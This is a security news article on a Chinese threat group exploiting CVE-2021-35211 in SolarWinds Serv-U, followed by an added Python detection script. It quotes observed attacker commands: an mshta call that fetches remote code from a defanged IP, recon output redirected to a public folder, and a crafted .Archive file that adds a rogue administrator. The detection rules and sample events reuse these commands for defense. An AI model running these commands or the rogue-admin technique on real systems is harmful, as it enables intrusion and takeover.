The infamous SolarWinds attacks have left a severe impact on the cybersecurity landscape. While organizations are still recovering from their consequences, Microsoft recently warned about a Chinese threat actor group, tracked as DEV-0322, exploiting a flaw in SolarWinds Serv-U FTP software.
The remote memory escape vulnerability CVE-2021-35211, which is now fixed, was found in Serv-U's implementation of the Secure Shell (SSH) protocol. The flaw could have allowed a remote attacker to run arbitrary code with privileges, enabling them to perform unauthorized actions such as deploying malware or altering information. The tech giant claimed that the DEV-0322 group is targeting the defense sector and IT organizations in the U.S. The threat group was found leveraging commercial VPN services and compromised Wi-Fi routers while attacking its targets.
Microsoft observed the zero-day attack behavior and identified malicious processes spawned by the Serv-U.exe process:
- C:\Windows\System32\mshta.exe http://144[.]34[.]179[.]162/a (defanged)
- cmd.exe /c whoami > "./Client/Common/redacted.txt"
- cmd.exe /c dir > ".\Client\Common\redacted.txt"
- cmd.exe /c ""C:\Windows\Temp\Serv-U.bat""
- cmd.exe C:\Windows\Temp\Serv-U.bat
- cmd.exe /c type \\redacted\redacted.Archive > "C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users\redacted.Archive"
“We observed DEV-0322 piping the output of their cmd.exe commands to files in the Serv-U \Client\Common\ folder, which is accessible from the internet by default so that the attackers could retrieve the results of the commands. The actor was also found adding a new global user to Serv-U, effectively adding themselves as a Serv-U administrator, by manually creating a crafted .Archive file in the Global Users directory. Serv-U user information is stored in these .Archive files,” Microsoft said. “Due to the way DEV-0322 had written their code when the exploit successfully compromises the Serv-U process, an exception is generated and logged to a Serv-U log file, DebugSocketLog.txt. The process could also crash after a malicious command was run.”
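The three behaviours Microsoft describes above (Serv-U.exe spawning cmd.exe or mshta.exe, command output redirected into the internet-reachable \Client\Common\ folder, and a crafted .Archive file written under Global Users) can be turned into a simple triage rule over process-creation telemetry. The following is an added example, not code from Microsoft or SolarWinds; it assumes events arrive as (parent image, child image, command line) tuples, as in Sysmon process-creation records, and the sample events and the placeholder URL are constructed for illustration.

```python
import re

# Constructed sample process-creation events (parent image, child image, command line).
# Modelled on the behaviours Microsoft described, not telemetry from any real incident;
# the URL is a placeholder, and the file names are made up.
SAMPLE_EVENTS = [
    (r"C:\Program Files\RhinoSoft\Serv-U\Serv-U.exe",
     r"C:\Windows\System32\mshta.exe",
     "mshta.exe http://placeholder.invalid/a"),
    (r"C:\Program Files\RhinoSoft\Serv-U\Serv-U.exe",
     r"C:\Windows\System32\cmd.exe",
     r'cmd.exe /c whoami > "./Client/Common/out.txt"'),
    (r"C:\Program Files\RhinoSoft\Serv-U\Serv-U.exe",
     r"C:\Windows\System32\cmd.exe",
     r'cmd.exe /c type \\fileserver\share\admin.Archive > "C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users\admin.Archive"'),
    (r"C:\Windows\explorer.exe",
     r"C:\Windows\System32\cmd.exe",
     "cmd.exe /c dir"),
    (r"C:\Program Files\RhinoSoft\Serv-U\Serv-U.exe",
     r"C:\Windows\System32\conhost.exe",
     "conhost.exe 0x4"),
]

SERVU_IMAGE = "serv-u.exe"
# Interpreters Microsoft reported being launched by Serv-U.exe during exploitation.
SUSPICIOUS_CHILDREN = {"cmd.exe", "mshta.exe"}
# \Client\Common\ is reachable from the internet by default, so output dropped there can be fetched.
CLIENT_COMMON_RE = re.compile(r"[\\/]client[\\/]common[\\/]", re.IGNORECASE)
# Serv-U stores user definitions as .Archive files; a new one under Global Users can be a rogue admin.
GLOBAL_USERS_ARCHIVE_RE = re.compile(r"global users[\\/][^\s\"]+\.archive", re.IGNORECASE)


def basename(path):
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage_event(parent_image, image, cmdline):
    """Return the reasons an event matches the Serv-U post-exploitation pattern (empty list if none)."""
    reasons = []
    if basename(parent_image) == SERVU_IMAGE and basename(image) in SUSPICIOUS_CHILDREN:
        reasons.append("Serv-U.exe spawned %s" % basename(image))
    if ">" in cmdline and CLIENT_COMMON_RE.search(cmdline):
        reasons.append("command output redirected into Client\\Common")
    if GLOBAL_USERS_ARCHIVE_RE.search(cmdline):
        reasons.append("write to a .Archive file under Global Users")
    return reasons


def triage(events):
    """Run triage_event over (parent, image, cmdline) tuples and keep only flagged events."""
    flagged = []
    for parent_image, image, cmdline in events:
        reasons = triage_event(parent_image, image, cmdline)
        if reasons:
            flagged.append((cmdline, reasons))
    return flagged


if __name__ == "__main__":
    for cmdline, reasons in triage(SAMPLE_EVENTS):
        print(cmdline)
        for reason in reasons:
            print("   -", reason)
```

Run against the constructed sample, the rule flags the mshta.exe launch, the whoami redirect into Client/Common, and the .Archive write under Global Users, while the explorer.exe-launched cmd.exe and the conhost.exe child of Serv-U.exe pass through untouched. The parent-child check alone is the broadest net; the two path checks carry the context that turns a hit into something worth escalating, and an exception in DebugSocketLog.txt at the same time is corroborating evidence worth pulling.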
While the root cause of the vulnerability is unknown, Microsoft urged organizations and users to immediately update their instances of Serv-U with the latest version.
SolarWinds Hackers Strike Again!
The SolarWinds supply chain attacks compromised the networks of nine government agencies and 100 private organizations. Last month, Microsoft revealed that Nobelium, the Russian-based cybercriminal group behind the SolarWinds hacks, is now targeting government agencies, think tanks, consultants, and non-governmental organizations globally.